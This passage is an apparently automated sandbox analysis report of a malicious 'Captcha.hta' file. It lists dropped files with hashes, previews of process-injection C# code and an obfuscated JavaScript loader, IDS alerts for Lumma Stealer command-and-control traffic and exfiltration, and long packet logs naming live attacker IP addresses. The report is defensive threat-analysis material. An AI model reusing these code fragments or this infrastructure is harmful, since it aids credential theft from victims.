Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Thu Dec 12 16:33:57 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1332
Entropy (8bit):	3.9877017828582675
Encrypted:	false
SSDEEP:	24:HbFzW9nuz5RHzwKTFpmfwI+ycuZhNQ53akSh5gPNnqS2d:wudRkKTzmo1ulQJa3hiqSG
MD5:	A04510705C70E41B85E8707259D22978
SHA1:	53C9C6C64ADF16F7F6746A38171F5910B72CE340
SHA-256:	99D4ED5111D812115E5CC80CAB3E188623A9DEE1C9A4632FE27C22E044CA9CC7
SHA-512:	CF72CA3D17D7D15E25ADE4EFB4234F3E378285B0841DE2128BB5C1D1CDCC7E50C12C61E4620AF5CE8FA7CADFD4AEB29254F0FF621A305553979C159024B5246F
Malicious:	false
Preview:	L...u.[g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP................am...A..8...RZZ...........5.......C:\Users\user\AppData\Local\Temp\RESEA2B.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.q.v.y.0.d.a.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ox3fkw3.xai.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmp4lrp5.lef.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0923813913827636
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryq53ak7Ynqqh5gPN5Dlq5J:+RI+ycuZhNQ53akSh5gPNnqX
MD5:	616D9199934189AA38DFE5F1525A5AAE
SHA1:	CF2F59A62F6DDC074095C53A674D6CA81AE73CD6
SHA-256:	EAD136EBFECA19255D10BEF51B621F3C1CAC389F5E782BBD94501797A83AC57A
SHA-512:	C3D9C61437EC2CD629F829923128E0358580F02D05FA9C815B73DF48B70218238B405886F3F6A7E4EB3F16139B1F1E449F9FBA057CB5AFB4F813AEF0551F7676
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.q.v.y.0.d.a.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.q.v.y.0.d.a.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	10583
Entropy (8bit):	4.487855797297623
Encrypted:	false
SSDEEP:	192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
MD5:	B022C6FE4494666C8337A975D175C726
SHA1:	8197D4A993E7547D19D7B067B4D28EBE48329793
SHA-256:	D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
SHA-512:	DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
Malicious:	true
Preview:	.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	5.001760545035336
Encrypted:	false
SSDEEP:	3:0HXEXA8F+H2R5BJiWR5mKWLRRONtkE2J5xAIIWLaiQCIFRVRMxTPIONtkE2J5xAE:pAu+H2L/6K2CN23fEzxszICN23fB
MD5:	9BE635EFB7EF2D7CB6CA5BF9DA3B960E
SHA1:	E4CF964008A26C14E8C0D99F1A0B24E9DCD51826
SHA-256:	39E0F3B48FD1E047D99D28C913A423C04C0FCE37C6F761A4C9058A2D82B07094
SHA-512:	B897E5F1518F875A15187D8EFD9DB799ED1770CB606287F61C28E8D382F73246D1266B8DFAC3AF23884ADE9489B1071107EF808F8070BB99F750E09C5C1E6011
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.0.cs"

C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	4.662098784476934
Encrypted:	false
SSDEEP:	96:gbuaQZGQf9xPQ2pCa/u67hHJu9IhbpPrjzKcaEZRGH0ljILHqrv5MqnTzeNc+iqK:gCaQHf9WDa/u6TRj2cadUxd5Mq/eNcz
MD5:	E6C0EBA4F3EEB7A507079730DD6DF636
SHA1:	E5B9D4EE9E6DB974A70E0DBAE666F5C0A3D72935
SHA-256:	08A6078B835AC7D9156B7176B86EEDF216746D90533C7069B956B32EAB740A3F
SHA-512:	FEC0773D75A301E86C4964E52C4F647255E223A1C059ADB2C2BA46F87823E6253E2C447DCFFA63971C0A1D5F411C42AD0515CF97A693C206C7D44D6314D76FC9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u.[g...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(...."..(......(.......0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p.....(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	705
Entropy (8bit):	5.248993446059102
Encrypted:	false
SSDEEP:	12:Kg/qR37L/6Km8NcKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KSqdn6KmocKax5DqBVKVrdFAMBJTH
MD5:	2262C9232CE968909A071AB0EF52CA6D
SHA1:	1EB2B378D13568A4AFB3FFD957921D046687B507
SHA-256:	3CFBFFB8E27D9559D151C360FBB75C24892C2A71518BC8D0E0F45C31EC50651C
SHA-512:	201301A3363411D09B9752B0A3CCB7A649FB4AD0FCFA04886B30B4294DDE081AFEBB2152BC0FDFF6930126D5C571E016D51A4ABDB9315E763A3B16DA99667AE3
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\curl.exe
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	320
Entropy (8bit):	3.3711747259066978
Encrypted:	false
SSDEEP:	6:I2swj2SAykymUeg/8Uni1qSgOgc21IXKn:Vz6ykymUexb1U9c56
MD5:	3E2B4564E95E46F793C0F59F05D6B27B
SHA1:	180C637D591BD5C5CE59D0C82689C53BB9D71584
SHA-256:	CB13041742D63BDE44881A653839F098226F1973F469253A78A2F7A612BCBE49
SHA-512:	E7D09883F06E54D97D6FA2B3D716A371174157BAA8B6237B3A27AEAB3240C81239E317DC8E0E847B95D8E69CE094B919D7958283B726B9DC47A8E92EBF36CEDE
Malicious:	false
Preview:	% Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.100 4062 100 4062 0 0 4062 0 0:00:01 --:--:-- 0:00:01 9295..

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (2054), with CRLF line terminators
Entropy (8bit):	3.4714896811582254
TrID:
File name:	Captcha.hta
File size:	2'097 bytes
MD5:	a7045bcb116c3d85f1ff3706bec2b920
SHA1:	4ff06af316d7e0453c948d358065d71301ea204a
SHA256:	8abf12e3a919213c8ff825c1cc1df070990156d829bd5c55d6ce2f6974d77272
SHA512:	81be5feffa1fec60145eaf21f4918a69dceb346d818560c38f9fc9ef0d972b6137b6778c3134a5a3d8e03bab1790fa1193c2ccffbd6beaf2388a1a12a9d4c4c0
SSDEEP:	24:q0d+2xhZjaVKR581JlcwHHR/ubvp+l0Eze5RJehY63OrFRBb:qaX3Z/I3H90vgl85nCPwF7
TLSH:	1D41A17C6621C88EAC337E7BECA87F60D254AF13EDC9A6C4081540863FE1469B5547DA
File Content Preview:	<script language="javascript">..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%20%20%20%20%20%20%20%20%28%66%75%6E%63%74%69%6F

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-12T17:33:57.549674+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.11.20	49710	147.45.44.131	80	TCP
2024-12-12T17:33:57.550523+0100	2800029	ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass	1	147.45.44.131	80	192.168.11.20	49710	TCP
2024-12-12T17:33:59.162444+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49711	172.67.207.38	443	TCP
2024-12-12T17:34:00.033272+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.11.20	49711	172.67.207.38	443	TCP
2024-12-12T17:34:00.033272+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49711	172.67.207.38	443	TCP
2024-12-12T17:34:00.352278+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49712	172.67.207.38	443	TCP
2024-12-12T17:34:00.936925+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.11.20	49712	172.67.207.38	443	TCP
2024-12-12T17:34:00.936925+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49712	172.67.207.38	443	TCP
2024-12-12T17:34:01.198117+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49713	172.67.207.38	443	TCP
2024-12-12T17:34:02.050943+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49714	172.67.207.38	443	TCP
2024-12-12T17:34:02.947656+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.11.20	49714	172.67.207.38	443	TCP
2024-12-12T17:34:03.244896+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49715	172.67.207.38	443	TCP
2024-12-12T17:34:04.255802+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49716	172.67.207.38	443	TCP
2024-12-12T17:34:05.548951+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49717	172.67.207.38	443	TCP
2024-12-12T17:34:08.579973+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49718	172.67.207.38	443	TCP
2024-12-12T17:34:09.472822+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49718	172.67.207.38	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 17:33:55.366131067 CET	49709	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:55.586704016 CET	80	49709	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:55.587172985 CET	49709	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:55.587621927 CET	49709	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:55.807702065 CET	80	49709	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:55.809194088 CET	80	49709	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:55.809232950 CET	80	49709	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:55.809247017 CET	80	49709	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:55.809257984 CET	80	49709	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:55.809423923 CET	49709	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:55.823656082 CET	49709	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:56.044431925 CET	80	49709	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.044634104 CET	49709	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:56.418873072 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:56.637157917 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.637301922 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:56.637471914 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:56.854470968 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.856739044 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.856750011 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.856946945 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.857002020 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.857012033 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.857022047 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.857029915 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:56.857042074 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.857053041 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.857063055 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.857072115 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:56.857204914 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:56.857204914 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:56.857204914 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:56.857254028 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.074033976 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.074049950 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.074063063 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.074074030 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.074413061 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.074645042 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.074660063 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.074685097 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.074868917 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.074884892 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.074913025 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.074924946 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.074934959 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.074944973 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.075079918 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.075257063 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.075257063 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.075297117 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.075309038 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.075319052 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.075505972 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.075519085 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.075529099 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.075570107 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.075575113 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.075747967 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.075747967 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.291964054 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.291975021 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.292150021 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.292171955 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.292197943 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.292206049 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.292212963 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.292341948 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.292510986 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.329849005 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.549443007 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.549458027 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.549674034 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.549707890 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.549745083 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.549756050 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550019979 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550050974 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550076962 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550095081 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550112963 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550132036 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550148964 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550168037 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550234079 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550234079 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550241947 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550244093 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550245047 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550263882 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550277948 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550326109 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550379992 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550399065 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550416946 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550435066 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550452948 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550470114 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550488949 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550498962 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550498962 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550523043 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550540924 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550559044 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550578117 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550667048 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550671101 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550683975 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550693989 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550704002 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550714016 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.550944090 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550944090 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550944090 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550944090 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550944090 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.550997019 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551022053 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551039934 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551058054 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551075935 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551093102 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551104069 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551112890 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551122904 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551176071 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.551176071 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.551386118 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.551397085 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551398993 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551399946 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551399946 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551399946 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.551611900 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.551611900 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.551774025 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.767293930 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767311096 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767324924 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767335892 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767585039 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767589092 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.767606020 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767616034 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767626047 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767792940 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.767823935 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767836094 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767844915 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767854929 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767880917 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.767903090 CET	80	49710	147.45.44.131	192.168.11.20
